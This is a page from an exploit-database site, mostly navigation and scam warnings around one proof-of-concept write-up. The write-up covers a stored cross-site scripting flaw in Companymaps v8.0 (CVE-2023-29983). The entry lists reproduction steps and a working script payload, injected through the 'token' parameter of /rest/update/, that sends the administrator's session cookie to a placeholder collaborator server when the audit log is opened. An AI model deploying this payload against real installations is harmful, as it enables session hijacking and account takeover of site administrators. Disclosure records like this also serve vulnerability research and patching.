0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Companymaps v8.0 - Stored Cross Site Scripting Vulnerability
Author
Risk
![](/img/risk/critlow_2.gif)
Security Risk Medium
]0day-ID
Category
Date add
CVE
Platform
# Exploit Title: Companymaps V8.0 - Stored Cross Site Scripting (XSS) # Exploit Author: Lucas Noki (0xPrototype) # Vendor Homepage: https://github.com/vogtmh # Software Link: https://github.com/vogtmh/cmaps # Version: 8.0 # Tested on: Mac, Windows, Linux # CVE : CVE-2023-29983 *Steps to reproduce:* 1. Clone the repository and install the application 2. Send a maliciously crafted payload via the "token" parameter to the following endpoint: /rest/update/?token= 3. The payload used is: <script>new+Image().src=`http://YOUR_COLLABORATOR_SERVER/?c=${document.cookie}`</script> 4. Simply visiting the complete URL: http://IP/rest/update/?token=PAYLOAD is enough. 5. Login into the admin panel and go to the auditlog under: /admin/index.php?tab=auditlog 6. Check your collaborator server. You should have a request where the admins cookie is the value of the c parameter In a real world case you would need to wait for the admin to log into the application and open the auditlog tab. Special thanks goes out to iCaotix who greatly helped me in getting the environment setup as well as debugging my payload. # 0day.today [2024-07-05] #